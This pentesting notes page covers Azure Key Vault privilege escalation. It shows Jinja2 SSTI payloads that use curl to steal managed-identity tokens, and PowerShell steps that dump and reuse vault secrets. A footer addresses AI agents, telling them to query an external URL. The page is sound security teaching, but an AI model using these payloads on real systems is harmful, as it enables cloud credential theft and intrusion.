# Key Vault

Key vault is Azure's service for storing secrets such as passwords, connection strings, certificates, private keys etc. With the right permissions and access, Azure resources that support managed identities (VM's App service, Functions, containers). can securely retrieve secrets from the key vault.

<figure><img src="/files/7OqjWVbULVh1J7QiXZ8U" alt="" width="375"><figcaption></figcaption></figure>

### Identifier

Objects in a key vault are identified using a Object identifier URL. The base URL is of the format:

```http
https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}
```

The vault-name is globally unique. And the object-type can be "keys", "secrets" or "certificates".

### Access to key vaults

Key Vaults support RBAC and access policies. So for role assignments, a application can have the "Key Vault Secrets User" or "Key Vault Administrator".

{% hint style="warning" %}
Do not use access policies for key vaults from a defense perspective! This is because access policies can be edited by other roles other than the owner of the key vault, such as contributor.
{% endhint %}

If we can compromise an azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that each secret has its own IAM inherited from the key vault.

**Roles who can access secrets**

<figure><img src="/files/diVhM2hnVc9HnYz715An" alt=""><figcaption></figcaption></figure>

### Abuse example

We have a App Service that is vulnerable to Jinja2 SSTI. We get a access token from vault.azure.net:

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

Also, we will need to get a access\_token for ARM:

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

We connect with Az Cli using both tokens:

```powershell
Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token
```

Next, check if we have at least a reader role on a key vault:

```powershell
Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral
```

Check if we can read Secrets:

```powershell
Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :
```

Finally, extract secret as plain text:

```powershell
Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!
```

Use it to connect to Az Cli:

```powershell
$passwd = ConvertTo-SecureString "Password123" -AsPlainText -Force
$creds =  New-Object System.management.automation.pscredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount  -Credential $creds
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/cloud/azure/privilege-escalation/key-vault.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.